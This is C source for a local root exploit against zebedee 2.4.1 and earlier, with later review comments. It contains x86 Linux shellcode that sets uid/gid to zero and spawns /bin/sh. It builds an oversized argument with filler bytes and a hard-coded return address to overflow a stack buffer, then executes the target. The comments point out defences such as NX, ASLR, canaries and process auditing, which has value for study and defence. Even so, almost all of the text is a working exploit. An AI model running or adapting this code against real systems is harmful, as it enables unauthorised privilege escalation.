Local exploit for zebedee versions 2.4.1 and below.
17bb269826aaa3d33e69b6e15e1ba31da90539c416e1a74bf9745eac1644ba2e
/*
zebedee <= 2.4.1 local sploit
by darkeagle
22.01.05
*/
#include <stdio.h>
#include <string.h>
/*
 * Payload bytes copied into the crafted argument by main().
 *
 * This is 32-bit x86 Linux machine code that uses the int 0x80 system-call
 * interface (the repeated "\xcd\x80"). Read as i386 syscall numbers, it
 * issues 0x17 (setuid) and 0x2e (setgid) with a zero argument, then 0x0b
 * (execve) on the trailing "/bin/sh" string.
 *
 * NOTE(review): the setuid/setgid calls only change anything if the
 * vulnerable process already holds root privilege (for example a
 * setuid-root install). The page does not say how zebedee is installed;
 * confirm this when assessing impact.
 *
 * Defensive relevance: the payload runs from stack memory, so a
 * non-executable stack (NX/DEP) stops it from executing even if the
 * overflow itself still occurs.
 */
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // author's description: setuid(0) followed by exec of /bin/sh
/*
 * Proof-of-concept driver: builds one oversized command-line argument and
 * executes the program named by argv[1] with it as that program's only
 * argument.
 *
 * Argument layout, as built below:
 *   - bytes 0..1999 are filler (0x43, ASCII 'C');
 *   - sizeof(long) bytes at offset 1052 are overwritten with RET;
 *   - the shellcode string starts at offset 2000;
 *   - the rest of the 14000-byte buffer stays zero, so the argument ends
 *     just after the shellcode.
 *
 * NOTE(review): the page does not identify which zebedee code path copies
 * this argument without a bounds check. The layout implies a fixed-size
 * stack buffer whose saved return address lies about 1052 bytes in, but
 * that is an inference from this file only.
 *
 * Why this matters to defenders:
 *   - RET is a single hard-coded stack address, so the technique depends on
 *     a predictable stack layout. Address-space layout randomisation breaks
 *     that assumption.
 *   - The payload runs from the stack, so a non-executable stack blocks it.
 *   - Stack protectors (canaries) and fortified string functions in the
 *     zebedee build would turn the overflow into an abort.
 *   - The page states versions <= 2.4.1 are affected and names no fixed
 *     release. Check the vendor's changelog for the first corrected version.
 *   - Observable artifact: an exec of the zebedee binary with a single
 *     argument of about 2 KB, made of repeated 0x43 bytes followed by
 *     non-printable bytes. Process-execution auditing can match on that.
 *
 * Returns 0. The return is reached only if execl() fails, because a
 * successful execl() does not return.
 */
int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000];
/* Without a target path, print usage and exit. */
if ( argc < 2 ) { printf("Zebedee local exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }
path = argv[1];
RET = 0xbffff910; // author's note: "mandrake 10.0 OR"; a fixed 32-bit stack address specific to that environment
/* Zero the whole buffer first so the final string is NUL-terminated. */
memset(buf, 0x00, sizeof(buf));
/* 2000 bytes of 0x43 filler. */
memset(buf, 0x43, 2000);
/* Append the payload immediately after the filler. */
sprintf(buf+2000, "%s", shellcode);
/* Overwrite part of the filler at offset 1052 with the hard-coded address. */
/* NOTE(review): this stores through a cast char pointer at an offset that is not guaranteed to be suitably aligned for long. */
*(long*)&buf[1052] = RET;
/* Run the target with the crafted buffer as argv[1]. */
execl(path, path, buf, NULL);
return 0;
}